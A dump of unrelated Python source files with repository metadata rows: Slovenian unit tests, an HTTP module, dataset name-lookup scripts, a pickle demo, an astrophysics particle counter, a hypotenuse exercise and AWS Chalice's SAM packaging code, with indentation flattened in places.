        self.assertEqual(koordinate("Brežice", kraji), (68.66, 7.04))
        self.assertEqual(koordinate("Lenart", kraji), (85.20, 78.75))
        self.assertEqual(koordinate("Rateče", kraji), (-65.04, 70.04))
        self.assertEqual(koordinate("Ljutomer", kraji), (111.26, 71.82))
        self.assertIsNone(koordinate("Ljubljana", kraji))
        kraji = [('Brežice', 68.66, 7.04)]
        self.assertEqual(koordinate("Brežice", kraji), (68.66, 7.04))
        self.assertIsNone(koordinate("Lenart", kraji))
        kraji = []
        self.assertIsNone(koordinate("Brežice", kraji))
def test_1_range_len(self):
        class NoGetItem(list):
            def __getitem__(*x):
                raise IndexError("Learn to use the for loop (properly)!")
        kraji = NoGetItem([('Brežice', 68.66, 7.04), ('Lenart', 85.20, 78.75),
                           ('Rateče', -65.04, 70.04)])
        self.assertEqual(koordinate("Brežice", kraji), (68.66, 7.04))
        self.assertEqual(koordinate("Lenart", kraji), (85.20, 78.75))
        self.assertEqual(koordinate("Rateče", kraji), (-65.04, 70.04))
        self.assertIsNone(koordinate("Ljubljana", kraji))
def test_2_razdalja_koordinat(self):
self.assertEqual(razdalja_koordinat(0, 0, 1, 0), 1)
self.assertEqual(razdalja_koordinat(0, 0, 0, 1), 1)
self.assertEqual(razdalja_koordinat(0, 0, -1, 0), 1)
self.assertEqual(razdalja_koordinat(0, 0, 0, -1), 1)
self.assertEqual(razdalja_koordinat(1, 0, 0, 0), 1)
self.assertEqual(razdalja_koordinat(0, 1, 0, 0), 1)
self.assertEqual(razdalja_koordinat(-1, 0, 0, 0), 1)
self.assertEqual(razdalja_koordinat(0, -1, 0, 0), 1)
self.assertEqual(razdalja_koordinat(1, 2, 4, 6), 5)
self.assertEqual(razdalja_koordinat(1, 2, -2, 6), 5)
self.assertEqual(razdalja_koordinat(1, 2, 4, -2), 5)
self.assertEqual(razdalja_koordinat(1, 2, -2, -2), 5)
from math import sqrt
self.assertAlmostEqual(razdalja_koordinat(1, 2, 0, 1), sqrt(2))
def test_3_razdalja_krajev(self):
        kraji = [
            ('Brežice', 10, 20),
            ('Lenart', 13, 24),
            ('Rateče', 17, 20),
            ('Ljutomer', 8, 36)
        ]
        from math import sqrt
        self.assertEqual(razdalja("Brežice", "Lenart", kraji), 5)
        self.assertEqual(razdalja("Lenart", "Brežice", kraji), 5)
        self.assertEqual(razdalja("Brežice", "Rateče", kraji), 7)
        self.assertAlmostEqual(razdalja("Lenart", "Rateče", kraji), sqrt(32))
        self.assertEqual(razdalja("Lenart", "Ljutomer", kraji), 13)
        koordinate.call_count = razdalja_koordinat.call_count = 0
        razdalja("Brežice", "Lenart", kraji)
        self.assertEqual(
            koordinate.call_count, 2,
            "The `razdalja` function must call `koordinate` twice")
        self.assertEqual(
            razdalja_koordinat.call_count, 1,
            "The `razdalja` function must call `razdalja_koordinat` once")
def test_4_v_dometu(self):
        kraji = [
            ('Lenart', 13, 24),
            ('Brežice', 10, 20),   # Lenart <-> Brežice = 5
            ('Rateče', 17, 20),    # Lenart <-> Rateče = 5.66
            ('Ljutomer', 8, 36)    # Lenart <-> Ljutomer = 13
        ]
        self.assertEqual(v_dometu("Lenart", 5, kraji), ["Brežice"])
        self.assertEqual(v_dometu("Lenart", 3, kraji), [])
        self.assertEqual(set(v_dometu("Lenart", 6, kraji)), {"Brežice", "Rateče"})
        kraji = self.vsi_kraji
        self.assertEqual(set(v_dometu("Ljubljana", 20, kraji)), {'Vrhnika', 'Domžale', 'Kamnik', 'Škofja Loka'})
def test_5_najbolj_oddaljeni(self):
        kraji = [
            ('Lenart', 13, 24),
            ('Brežice', 10, 20),   # Lenart <-> Brežice = 5
            ('Rateče', 17, 20),    # Lenart <-> Rateče = 5.66
            ('Ljutomer', 8, 36)    # Lenart <-> Ljutomer = 13
        ]
        self.assertEqual(najbolj_oddaljeni("Lenart", ["Brežice", "Rateče"], kraji), "Rateče")
        self.assertEqual(najbolj_oddaljeni("Lenart", ["Brežice"], kraji), "Brežice")
        kraji = self.vsi_kraji
        self.assertEqual(najbolj_oddaljeni("Ljubljana", ["Domžale", "Kranj", "Maribor", "Vrhnika"], kraji), "Maribor")
def test_6_zalijemo(self):
self.assertEqual(zalijemo("Ljubljana", 30, self.vsi_kraji), "Cerknica")
def test_7_presek(self):
self.assertEqual(presek([1, 5, 2], [3, 1, 4]), [1])
self.assertEqual(presek([1, 5, 2], [3, 0, 4]), [])
self.assertEqual(presek([1, 5, 2], []), [])
self.assertEqual(presek([], [3, 0, 4]), [])
self.assertEqual(presek([], []), [])
self.assertEqual(set(presek([1, 5, 2], [2, 0, 5])), {2, 5})
self.assertEqual(presek(["Ana", "Berta", "Cilka"], ["Cilka", "Dani", "Ema"]), ["Cilka"])
def test_8_skupno_zalivanje(self):
        self.assertEqual(set(skupno_zalivanje("Bled", "Ljubljana", 30, self.vsi_kraji)),
                         {"Kranj", "Škofja Loka"})
if __name__ == "__main__":
unittest.main()
bc291688aa3ce741509d6240563d380a29e2dd1a | 62d6a37e1fb1b224b53e14a1cf151ef0571aa20f | /orun/http/__init__.py | 5d27eb7d2410dda8fe4263aa9eb1974206200fbe | [] | no_license | katrid/orun | 4fa0f291a1ef43f16bc1857a170fc0b2e5e06739 | bfc6dae06182124ba75b1f3761d81ba8ca387dea | refs/heads/master | 2023-08-30T03:58:34.570527 | 2023-08-09T04:05:30 | 2023-08-09T04:05:30 | 66,562,767 | 14 | 4 | null | 2023-01-06T22:29:37 | 2016-08-25T14:01:44 | Python | UTF-8 | Python | false | false | 1,004 | py | from orun.http.cookie import SimpleCookie, parse_cookie
from orun.http.request import (
HttpRequest, QueryDict, RawPostDataException, UnreadablePostError,
)
from orun.http.response import (
BadHeaderError, FileResponse, Http404, HttpResponse,
HttpResponseBadRequest, HttpResponseForbidden, HttpResponseGone,
HttpResponseNotAllowed, HttpResponseNotFound, HttpResponseNotModified,
HttpResponsePermanentRedirect, HttpResponseRedirect,
HttpResponseServerError, JsonResponse, StreamingHttpResponse,
)
__all__ = [
'SimpleCookie', 'parse_cookie', 'HttpRequest', 'QueryDict',
'RawPostDataException', 'UnreadablePostError',
'HttpResponse', 'StreamingHttpResponse', 'HttpResponseRedirect',
'HttpResponsePermanentRedirect', 'HttpResponseNotModified',
'HttpResponseBadRequest', 'HttpResponseForbidden', 'HttpResponseNotFound',
'HttpResponseNotAllowed', 'HttpResponseGone', 'HttpResponseServerError',
'Http404', 'BadHeaderError', 'JsonResponse', 'FileResponse',
]
2f2e173cedfb3e0b03918438536ae26ad4faaab9 | 2ca998dd8361984c4d4312f80b0c4ff67fcc84f4 | /mid2names.py | 24c72dac715ed35ecb5f14d4fefbc984ac4b12ae | [] | no_license | rohitpatwa/dbExtend | 31a7f1935d240595bc10f3d3641c7d051abf2047 | dad7de67141edc3d7353c5f1762a8786b9e3b997 | refs/heads/master | 2022-03-31T04:16:06.719265 | 2020-01-22T23:28:20 | 2020-01-22T23:28:20 | 235,421,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | """Create LUT from a given db
Script to create a LUT (lookup table) with FID.MID as the keys and English names as values.
The script assumes the file structure to be F0001/MID1 for all FIDs. It then reads all the
mid.csv files in the MID? folders and appends them to a dataframe.
The purpose of this script is to prepare FIW for finding overlapping names across other datasets.
"""
import glob
import re
from tqdm import tqdm
import pandas as pd
def clean_name(name):
""" Cleans a given input name.
Args:
name: input name
Returns:
cleaned name
"""
# TODO: implement this method
pass
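    # A possible implementation sketch (hypothetical -- the method above is a
    # TODO, so these cleaning rules are an assumption):
    #     return re.sub(r'\s+', ' ', re.sub(r'[^a-z\s]', '', name.lower())).strip()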
def import_fiw_names(path):
""" Create a LUT from all the names of the db
Args:
path: Path to the folder containing FIDs
Returns:
Saves a file with the name FIW_LUT.csv.
Returns dataframe of FIW_LUT
"""
# make sure the path ends with a '/'
if not re.search(r'\/$', path):
path += '/'
# read all the paths matching the given format
paths = sorted(glob.glob(path + 'F????/mid.csv'))
df = pd.DataFrame(
columns=['source_db', 'fid', 'mid', 'gender', 'first', 'first_alias', 'last', 'last_alias', 'name'])
# Read a csv file which contains last names of all the FIDs
last_name_file_path = '/'.join(path.split('/')[:-2]) + '/FIW_FIDs.csv'
last_name_df = pd.read_csv(last_name_file_path)
for p in tqdm(paths):
# Extract fid from path
fid = re.sub(r'.*(F\d{4}).*', r'\1', p)
d = pd.read_csv(p)
# this check is applied because a few families are missing in last_name_df. it will be fixed in future
if fid in last_name_df['fid'].values:
last = last_name_df.query('fid==@fid').iloc[0]['surname'].split('.')[0]
else:
last = ''
# TODO: Develop a way to get aliases
for i in d.index:
first, mid, gender = d.loc[i, ['Name', 'MID', 'Gender']]
first_alias = '' # alias
last_alias = '' # to be fetched
name = ' '.join([first, last]).strip()
df.loc[len(df)] = ['FIW', fid, mid, gender, first, first_alias, last, last_alias, name.lower()]
df.to_csv('FIW_LUT.csv', index=False)
return df
def import_family101_names(path):
"""Create a LUT for Family101 db
Args:
path: path to the FAMILY101.txt file
Returns:
Saves a file with the name Family101_LUT.csv.
returns a dataframe with all the names from family101 db
"""
# open the file containing family101 names
f = open(path)
df = pd.DataFrame(columns=['source_db', 'name', 'gender', 'relation', 'first', 'last', 'family_name'])
for row in tqdm(f.readlines()):
row = re.sub(r'\n', '', row)
if row:
# Each row has a structure "1 HUSB Barac_Obama"
row_split = row.split()
relation, name = row_split[1], row_split[2].replace('_', ' ')
# These rows are not of any use, they just mention the family surname
if relation == 'FAMI':
family_name = name
else:
name_split = name.split()
first, last = '', ''
if len(name_split) > 1:
first, last = name_split[0], name_split[-1]
# There are only 4 relations ["HUSB", "WIFE", "SONN", "DAUG"]
if relation == 'HUSB' or relation == 'SONN':
gender = 'm'
else:
gender = 'f'
df.loc[len(df)] = 'family101', name.lower(), gender, relation, first, last, family_name
df.to_csv('Family101_LUT.csv', index=False)
return df
# Testing code
import sys
if __name__ == "__main__":
p = sys.argv[1]
import_fiw_names(p)
import_family101_names(p)
3784205655c4e6b4cfa9c7dfccd811231c871938 | ac15eda44e8dcfee6dff62f514c5b98a3382f50d | /python/les5/les5_3.py | f7632dd52e6ce6a4948be0711a402c746542fd4a | [] | no_license | yangruihan/raspberrypi | 5789c1a2e72d4012d46563d0644b08d032d346e6 | 22bc1a06b25e129a4314f4bc9cec5112affda136 | refs/heads/master | 2022-12-27T09:27:05.102020 | 2020-10-13T09:41:24 | 2020-10-13T09:41:24 | 32,977,936 | 4 | 0 | null | 2022-12-16T01:47:53 | 2015-03-27T09:30:43 | Java | UTF-8 | Python | false | false | 232 | py | #!/usr/bin/env python3
import pickle
with open('mydata.pickle', 'wb') as mysavedata:
pickle.dump([1, 2, 'three'], mysavedata)
with open('mydata.pickle', 'rb') as myrestoredata:
a_list = pickle.load(myrestoredata)
print(a_list)
40b8cf0d6ea7ccb94390214e6f73406717a8998d | 91c702af361deb5301c7f7f420cd09383480878a | /gastrack/countParticles.py | 96964c3c5d77fd8cb72f3571512a9ffa907b5b13 | [
"MIT",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | myinxd/gastrack | 88baff1972d21c48cfd5419a0f6136b029c7e28b | da2f7390eace2ba231f6d3b28968be0ca7331a44 | refs/heads/master | 2021-01-12T11:44:49.618338 | 2017-11-24T01:17:37 | 2017-11-24T01:17:37 | 72,290,045 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,510 | py | # !/usr/bin/python3
# Copyright (C) 2016 Zhixian MA <[email protected]>
"""
A tool to count the number of particles in the provided regions.
"""
import os
import sys
import re
import h5py
import numpy as np
import utils
class Cluster:
"""
The cluster class
Parameters
----------
filepath: string
File path of the snap.
clstype: string
Major or minor cluster, can be 'maj' or 'min'.
numhalo: int
Number of halo particles in the major cluster.
numgas: int
Number of gas particles in the major cluster.
Methods
-------
load_hdf5: load file
get_idx: get indices of the cluster according to its type.
get_particles: get particles in the cluster.
"""
def __init__(self, filepath, clstype, numhalo, numgas):
self.numhalo = numhalo
self.numgas = numgas
self.clstype = clstype
self.filepath = filepath
self.unit_len = 3.08568E21 # [cm]
self.cm2Mpc = 3.240779289469756E-25
# Open file
try:
self.load_hdf5()
except IOError:
print('File does not exist.')
return
def load_hdf5(self):
"""Open file"""
self.filepart = h5py.File(self.filepath, 'r')
def get_idx(self):
"""Get indices of the cluster"""
# Init
gas_group = self.filepart['PartType0']
halo_group = self.filepart['PartType1']
gas_id = np.array(gas_group['ParticleIDs'])
halo_id = np.array(halo_group['ParticleIDs'])
# judge cluster
if self.clstype == 'maj':
# major cluster
self.gasidx = gas_id <= self.numgas
self.haloidx = halo_id <= self.numhalo + len(gas_id)
self.gas_id = gas_id[self.gasidx]
self.halo_id = halo_id[self.haloidx]
elif self.clstype == 'min':
# minor cluster
self.gasidx = gas_id > self.numgas
self.haloidx = halo_id > self.numhalo + len(gas_id)
self.gas_id = gas_id[self.gasidx]
self.halo_id = halo_id[self.haloidx]
def get_particles(self):
"""
Get the cords and data
Output
------
cords: np.ndarray
coordinates of the particles
data: np.ndarray
data with repect to the field
"""
# Get indices
self.get_idx()
# Get cords and fields
# gas
gas_group = self.filepart['PartType0']
# coordinates
cords = np.array(gas_group['Coordinates'])
self.gas_cords = cords[self.gasidx, :] * self.unit_len * self.cm2Mpc
# field
data = np.array(gas_group['Density'])
self.gas_den = data[self.gasidx]
# halo
halo_group = self.filepart['PartType1']
# coordinates
cords = np.array(halo_group['Coordinates'])
self.halo_cords = cords[self.haloidx, :] * self.unit_len * self.cm2Mpc
# field
data = np.array(halo_group['Masses'])
self.halo_den = data[self.haloidx]
def get_cls(filepath, numhalo, numgas):
"""Get clusters
Parameters
----------
filepath: string
File path of the snap.
numhalo: int
Number of halo particles in the major cluster.
numgas: int
Number of gas particles in the major cluster.
Output
------
maj_cls: Cluster object
The major cluster.
min_cls: Cluster object
The minor cluster.
"""
# Get clusters
maj_cls = Cluster(filepath, 'maj', numhalo, numgas)
min_cls = Cluster(filepath, 'min', numhalo, numgas)
maj_cls.get_particles()
min_cls.get_particles()
return maj_cls, min_cls
def get_peak(maj_cls, step=0.005):
"""
    Generate projected density maps along each axis and locate the halo peak.
Parameters
----------
maj_cls: Cluster object
The major cluster
step: double
Step or width of the cubic for generating mosaic projection map.
Output
------
peak: list
Coordinate of the peak in the projected map.
"""
halo_z = utils.gen_mosaic(maj_cls.halo_cords, maj_cls.halo_den, step, 'z')
peak_z = utils.get_peaks(halo_z, step)
# y direction
halo_y = utils.gen_mosaic(maj_cls.halo_cords, maj_cls.halo_den, step, 'y')
peak_y = utils.get_peaks(halo_y, step)
# x direction
halo_x = utils.gen_mosaic(maj_cls.halo_cords, maj_cls.halo_den, step, 'x')
peak_x = utils.get_peaks(halo_x, step)
# Combine
x = (peak_z[1] + peak_y[1]) / 2
y = (peak_z[2] + peak_x[1]) / 2
z = (peak_x[2] + peak_y[2]) / 2
peak = [x, y, z]
return peak
def calc_particles(maj_cls, min_cls, peak, reg_mode, reg_params):
"""
    Calculate the number of particles in the provided region
    Parameters
    ----------
    maj_cls, min_cls: Cluster objects
        The major and minor clusters.
    peak: list
        Coordinates of the region centre, e.g. the halo density peak.
    reg_mode: string
        Mode of the region, can be 'cir' (sphere) or 'sec' (radial sector)
    reg_params: list
        Parameters of the region: the radius for 'cir', or
        [radius_low, radius_high, angle_low, angle_high] for 'sec'
"""
# Init
part_total = 0
part_maj = 0
part_min = 0
# Calc particles
if reg_mode == 'cir':
# parmaters
x_c = peak[0]
y_c = peak[1]
z_c = peak[2]
radius = reg_params
# maj
maj_x = maj_cls.gas_cords[:, 0] - x_c
maj_y = maj_cls.gas_cords[:, 1] - y_c
maj_z = maj_cls.gas_cords[:, 2] - z_c
# maj_z = maj_cls.gas_cords[:,2]
maj_dist = np.sqrt(maj_x**2 + maj_y**2 + maj_z**2)
maj_idx = maj_dist <= radius
part_maj = maj_idx.sum()
# min
min_x = min_cls.gas_cords[:, 0] - x_c
min_y = min_cls.gas_cords[:, 1] - y_c
min_z = min_cls.gas_cords[:, 2] - z_c
# min_z = min_cls.gas_cords[:,2]
min_dist = np.sqrt(min_x**2 + min_y**2 + min_z**2)
min_idx = min_dist <= radius
part_min = min_idx.sum()
# sum
part_total = part_maj + part_min
elif reg_mode == 'sec':
# parmaters
x_c = peak[0]
y_c = peak[1]
z_c = peak[2]
radius_low = reg_params[0]
radius_high = reg_params[1]
angle_low = reg_params[2]
angle_high = reg_params[3]
if angle_low >= 2 * np.pi:
angle_low -= 2 * np.pi
angle_high -= 2 * np.pi
if angle_high > 2 * np.pi:
angle_low = [angle_low, 0]
angle_high = [2 * np.pi, angle_high - 2 * np.pi]
else:
angle_low = [angle_low]
angle_high = [angle_high]
maj_idx = np.zeros(maj_cls.gas_id.shape)
maj_idx = maj_idx.astype(bool)
min_idx = np.zeros(min_cls.gas_id.shape)
min_idx = min_idx.astype(bool)
for i in range(len(angle_low)):
# maj
maj_x = maj_cls.gas_cords[:, 0] - x_c
maj_y = maj_cls.gas_cords[:, 1] - y_c
maj_z = maj_cls.gas_cords[:, 2] - z_c
# maj_z = maj_cls.gas_cords[:,2]
maj_dist = np.sqrt(maj_x**2 + maj_y**2 + maj_z**2)
maj_ang = np.arcsin(np.abs(maj_y) / maj_dist)
maj_idx_dist = (maj_dist <= radius_high) * (maj_dist >= radius_low)
# Quarant1
idx_q1 = (maj_x >= 0) * (maj_y >= 0)
idx_ang1 = (maj_ang <= angle_high[i]) * (maj_ang >= angle_low[i])
# Quarant2
idx_q2 = (maj_x < 0) * (maj_y >= 0)
idx_ang2 = ((np.pi - maj_ang) <=
angle_high[i]) * ((np.pi - maj_ang) >= angle_low[i])
# Quarant3
idx_q3 = (maj_x < 0) * (maj_y < 0)
idx_ang3 = ((np.pi + maj_ang) <=
angle_high[i]) * ((np.pi + maj_ang) >= angle_low[i])
# Quarant4
idx_q4 = (maj_x >= 0) * (maj_y <= 0)
idx_ang4 = ((2 * np.pi - maj_ang) <=
angle_high[i]) * ((2 * np.pi - maj_ang) >= angle_low[i])
# Combine idx
maj_idx_t = (idx_ang1 * idx_q1) + (idx_ang2 * idx_q2) + \
(idx_ang3 * idx_q3) + (idx_ang4 * idx_q4)
maj_idx_t = (maj_idx_dist) * (maj_idx_t)
maj_idx = maj_idx + maj_idx_t
part_maj += maj_idx_t.sum()
# min
min_x = min_cls.gas_cords[:, 0] - x_c
min_y = min_cls.gas_cords[:, 1] - y_c
min_z = min_cls.gas_cords[:, 2] - z_c
min_dist = np.sqrt(min_x**2 + min_y**2 + min_z**2)
min_ang = np.arcsin(np.abs(min_y) / min_dist)
min_idx_dist = (min_dist <= radius_high) * (min_dist >= radius_low)
# Quarant1
idx_q1 = (min_x >= 0) * (min_y >= 0)
idx_ang1 = (min_ang <= angle_high[i]) * (min_ang >= angle_low[i])
# Quarant2
idx_q2 = (min_x < 0) * (min_y >= 0)
idx_ang2 = ((np.pi - min_ang) <=
angle_high[i]) * ((np.pi - min_ang) >= angle_low[i])
# Quarant3
idx_q3 = (min_x < 0) * (min_y < 0)
idx_ang3 = ((np.pi + min_ang) <=
angle_high[i]) * ((np.pi + min_ang) >= angle_low[i])
# Quarant4
idx_q4 = (min_x >= 0) * (min_y <= 0)
idx_ang4 = ((2 * np.pi - min_ang) <=
angle_high[i]) * ((2 * np.pi - min_ang) >= angle_low[i])
# Combine idx
min_idx_t = (idx_ang1 * idx_q1) + (idx_ang2 * idx_q2) + \
(idx_ang3 * idx_q3) + (idx_ang4 * idx_q4)
min_idx_t = (min_idx_dist) * (min_idx_t)
min_idx = min_idx + min_idx_t
part_min += min_idx_t.sum()
# sum
part_total = part_maj + part_min
else:
print("Mode %s is not supported at present" % reg_mode)
partlist = [part_total, part_maj, part_min]
return partlist, maj_idx, min_idx
def main(argv):
"""The main method"""
# Init
file1 = argv[1]
file2 = argv[2]
# get id
snapid1 = re.findall(r'[0-9][0-9][0-9]', file1)
snapid1 = int(snapid1[0])
snapid2 = re.findall(r'[0-9][0-9][0-9]', file2)
snapid2 = int(snapid2[0])
outpath = argv[3]
# Init of parameters
numhalo = int(argv[4]) # 734866
numgas = int(argv[5]) # 704860
step = 0.01
# get cls of file1
maj_cls_f1, min_cls_f1 = get_cls(file1, numhalo, numgas)
# get cls of file2
maj_cls_f2, min_cls_f2 = get_cls(file2, numhalo, numgas)
# get peak
peak1 = get_peak(maj_cls_f1, step)
peak2 = get_peak(maj_cls_f2, step)
# Calc particles of file2
print('Searching for particles at %.2f Gyr ...' % (snapid2 * 0.02))
part_ori, maj_idx_f2, min_idx_f2 = calc_particles(maj_cls_f2,
min_cls_f2,
peak2, 'cir', 50 / 1000)
print('Total particles at %.2f Gyr: %d' % (snapid2 * 0.02, part_ori[0]))
print('Major particles at %.2f Gyr: %d' % (snapid2 * 0.02, part_ori[1]))
print('Minor particles at %.2f Gyr: %d' % (snapid2 * 0.02, part_ori[2]))
# Calc particles of file1
# calc circles
    print('Searching for particles in the sector region at %.2f Gyr...'
          % (snapid1 * 0.02))
reg_mode = 'sec'
reg_params = [float(argv[6]), float(argv[7]),
float(argv[8]) / 180 * np.pi,
float(argv[9]) / 180 * np.pi]
part_sec, maj_idx_c, min_idx_c = calc_particles(
maj_cls_f1, min_cls_f1, peak1, reg_mode, reg_params)
print('Total particles at %.2f Gyr: %d' % (snapid1 * 0.02, part_sec[0]))
print('Major particles at %.2f Gyr: %d' % (snapid1 * 0.02, part_sec[1]))
print('Minor particles at %.2f Gyr: %d' % (snapid1 * 0.02, part_sec[2]))
# diff
part_maj_c = utils.cmp_id(maj_cls_f1, maj_cls_f2, maj_idx_c, maj_idx_f2)
print('Major particles from %.2f Gyr: %d' % (snapid2 * 0.02, part_maj_c))
part_min_c = utils.cmp_id(min_cls_f1, min_cls_f2, min_idx_c, min_idx_f2)
print('Minor particles from %.2f Gyr: %d' % (snapid2 * 0.02, part_min_c))
# save
# filename = os.path.join(outdir,'particles.txt')
filename = outpath
if os.path.exists(filename):
os.remove(filename)
f = open(filename, 'a')
else:
f = open(filename, 'a')
f.write("Particles at %0.2f Gyr.\n" % (snapid2 * 0.02))
f.write('Total particles at %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_ori[0]))
f.write('Major particles at %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_ori[1]))
f.write('Minor particles at %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_ori[2]))
f.write('\n')
f.write("Particles at %0.2f Gyr in the section region.\n" %
(snapid1 * 0.02))
f.write('Total particles at %.2f Gyr: %d\n' %
(snapid1 * 0.02, part_sec[0]))
f.write('Major particles at %.2f Gyr: %d\n' %
(snapid1 * 0.02, part_sec[1]))
f.write('Minor particles at %.2f Gyr: %d\n' %
(snapid1 * 0.02, part_sec[2]))
f.write('Major particles from %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_maj_c))
f.write('Minor particles from %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_min_c))
f.close()
if __name__ == "__main__":
main(sys.argv)
8b51fa52d6cef1d961cb8e29185932c1f2371400 | a95a398f7f1e4306367f22ff59a9da72a8c23b46 | /course-files/lectures/lecture_04/07_activity.py | c4bf8d853793765bb768a13eb6186ba70431a59a | [] | no_license | eecs110/spring2020 | 74ff8a317cf009aa727ad46e143e1c6619c83086 | a726d32c5eb418f4bf0fe27fae1f6479e4ae8140 | refs/heads/master | 2022-10-18T21:58:19.690897 | 2020-06-03T01:04:20 | 2020-06-03T01:04:20 | 251,242,896 | 0 | 0 | null | 2022-10-06T10:22:24 | 2020-03-30T08:17:53 | Python | UTF-8 | Python | false | false | 445 | py | from operator import add, mul, sub, truediv, mod, floordiv, pow
# for more info, see the docs: https://docs.python.org/3/library/operator.html
# Challenge: Create a custom function called "hypotenuse" that calculates
# the hypotenuse of any triangle. Then, invoke that function using the
# following triangle dimensions:
# triangle 1: side_a = 5, side_b = 12
# triangle 2: side_a = 3, side_b = 5
# triangle 3: side_a = 4, side_b = 4
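# One possible solution (a sketch -- the challenge above fixes only the name
# "hypotenuse"; using the operator helpers imported above is a choice, not a
# requirement):
def hypotenuse(side_a, side_b):
    # c = sqrt(a^2 + b^2), written with operator.add and operator.pow
    return pow(add(pow(side_a, 2), pow(side_b, 2)), 0.5)
print(hypotenuse(5, 12))  # 13.0
print(hypotenuse(3, 5))   # ~5.83095
print(hypotenuse(4, 4))   # ~5.65685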
07d6d0d03eb9241e5ed49723bdf77dc4844cac19 | d07f4cd12b40fb4e009b4e36c4d8c0b42b35768d | /chalice/package.py | 642f4878836bd056bc1932395c3295c4d75224c8 | [
"Apache-2.0"
] | permissive | birkoff/chalice | b865d17d085dc92842da09d82033411001a2e01c | 83ffea3773519a26bf1c72ef48b33c149ccdcc2f | refs/heads/master | 2021-01-21T20:56:46.260466 | 2017-05-23T17:03:40 | 2017-05-23T17:03:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,897 | py | import os
import copy
import json
import hashlib
from typing import Any, Dict # noqa
from chalice import __version__ as chalice_version
from chalice.deploy.swagger import CFNSwaggerGenerator
from chalice.deploy.swagger import SwaggerGenerator # noqa
from chalice.deploy.packager import LambdaDeploymentPackager
from chalice.deploy.deployer import ApplicationPolicyHandler
from chalice.utils import OSUtils
from chalice.config import Config # noqa
from chalice.app import Chalice # noqa
from chalice.policy import AppPolicyGenerator
def create_app_packager(config):
# type: (Config) -> AppPackager
osutils = OSUtils()
# The config object does not handle a default value
# for autogen'ing a policy so we need to handle this here.
return AppPackager(
        # We add placeholder values that will be filled in once the
        # lambda function is deployed.
SAMTemplateGenerator(
CFNSwaggerGenerator('{region}', '{lambda_arn}'),
PreconfiguredPolicyGenerator(
config,
ApplicationPolicyHandler(
osutils, AppPolicyGenerator(osutils)))),
LambdaDeploymentPackager()
)
class PreconfiguredPolicyGenerator(object):
def __init__(self, config, policy_gen):
# type: (Config, ApplicationPolicyHandler) -> None
self._config = config
self._policy_gen = policy_gen
def generate_policy_from_app_source(self):
# type: () -> Dict[str, Any]
return self._policy_gen.generate_policy_from_app_source(
self._config)
class SAMTemplateGenerator(object):
_BASE_TEMPLATE = {
'AWSTemplateFormatVersion': '2010-09-09',
'Transform': 'AWS::Serverless-2016-10-31',
'Outputs': {
'RestAPIId': {
'Value': {'Ref': 'RestAPI'},
},
'APIHandlerName': {
'Value': {'Ref': 'APIHandler'},
},
'APIHandlerArn': {
'Value': {'Fn::GetAtt': ['APIHandler', 'Arn']}
},
'EndpointURL': {
'Value': {
'Fn::Sub': (
'https://${RestAPI}.execute-api.${AWS::Region}'
# The api_gateway_stage is filled in when
# the template is built.
'.amazonaws.com/%s/'
)
}
}
}
} # type: Dict[str, Any]
def __init__(self, swagger_generator, policy_generator):
# type: (SwaggerGenerator, PreconfiguredPolicyGenerator) -> None
self._swagger_generator = swagger_generator
self._policy_generator = policy_generator
def generate_sam_template(self, config, code_uri='<placeholder>'):
# type: (Config, str) -> Dict[str, Any]
template = copy.deepcopy(self._BASE_TEMPLATE)
resources = {
'APIHandler': self._generate_serverless_function(config, code_uri),
'RestAPI': self._generate_rest_api(
config.chalice_app, config.api_gateway_stage),
}
template['Resources'] = resources
self._update_endpoint_url_output(template, config)
return template
def _update_endpoint_url_output(self, template, config):
# type: (Dict[str, Any], Config) -> None
url = template['Outputs']['EndpointURL']['Value']['Fn::Sub']
template['Outputs']['EndpointURL']['Value']['Fn::Sub'] = (
url % config.api_gateway_stage)
def _generate_serverless_function(self, config, code_uri):
# type: (Config, str) -> Dict[str, Any]
properties = {
'Runtime': config.lambda_python_version,
'Handler': 'app.app',
'CodeUri': code_uri,
'Events': self._generate_function_events(config.chalice_app),
'Policies': [self._generate_iam_policy()],
'Tags': self._function_tags(config),
}
if config.environment_variables:
properties['Environment'] = {
'Variables': config.environment_variables
}
return {
'Type': 'AWS::Serverless::Function',
'Properties': properties,
}
def _function_tags(self, config):
# type: (Config) -> Dict[str, str]
tag = 'version=%s:stage=%s:app=%s' % (chalice_version,
config.chalice_stage,
config.app_name)
return {'aws-chalice': tag}
def _generate_function_events(self, app):
# type: (Chalice) -> Dict[str, Any]
events = {}
for _, view in app.routes.items():
for http_method in view.methods:
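                # event key: view name + lower-cased HTTP method + the first
                # 4 hex chars of the md5 of the view name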
key_name = ''.join([
view.view_name, http_method.lower(),
hashlib.md5(
view.view_name.encode('utf-8')).hexdigest()[:4],
])
events[key_name] = {
'Type': 'Api',
'Properties': {
'Path': view.uri_pattern,
'RestApiId': {'Ref': 'RestAPI'},
'Method': http_method.lower(),
}
}
return events
def _generate_rest_api(self, app, api_gateway_stage):
# type: (Chalice, str) -> Dict[str, Any]
swagger_definition = self._swagger_generator.generate_swagger(app)
properties = {
'StageName': api_gateway_stage,
'DefinitionBody': swagger_definition,
}
return {
'Type': 'AWS::Serverless::Api',
'Properties': properties,
}
def _generate_iam_policy(self):
# type: () -> Dict[str, Any]
return self._policy_generator.generate_policy_from_app_source()
class AppPackager(object):
def __init__(self,
sam_templater, # type: SAMTemplateGenerator
lambda_packager, # type: LambdaDeploymentPackager
):
# type: (...) -> None
self._sam_templater = sam_templater
        self._lambda_packager = lambda_packager
def _to_json(self, doc):
# type: (Any) -> str
return json.dumps(doc, indent=2, separators=(',', ': '))
def package_app(self, config, outdir):
# type: (Config, str) -> None
# Deployment package
zip_file = os.path.join(outdir, 'deployment.zip')
        self._lambda_packager.create_deployment_package(
config.project_dir, zip_file)
# SAM template
sam_template = self._sam_templater.generate_sam_template(
config, './deployment.zip')
if not os.path.isdir(outdir):
os.makedirs(outdir)
with open(os.path.join(outdir, 'sam.json'), 'w') as f:
f.write(self._to_json(sam_template))
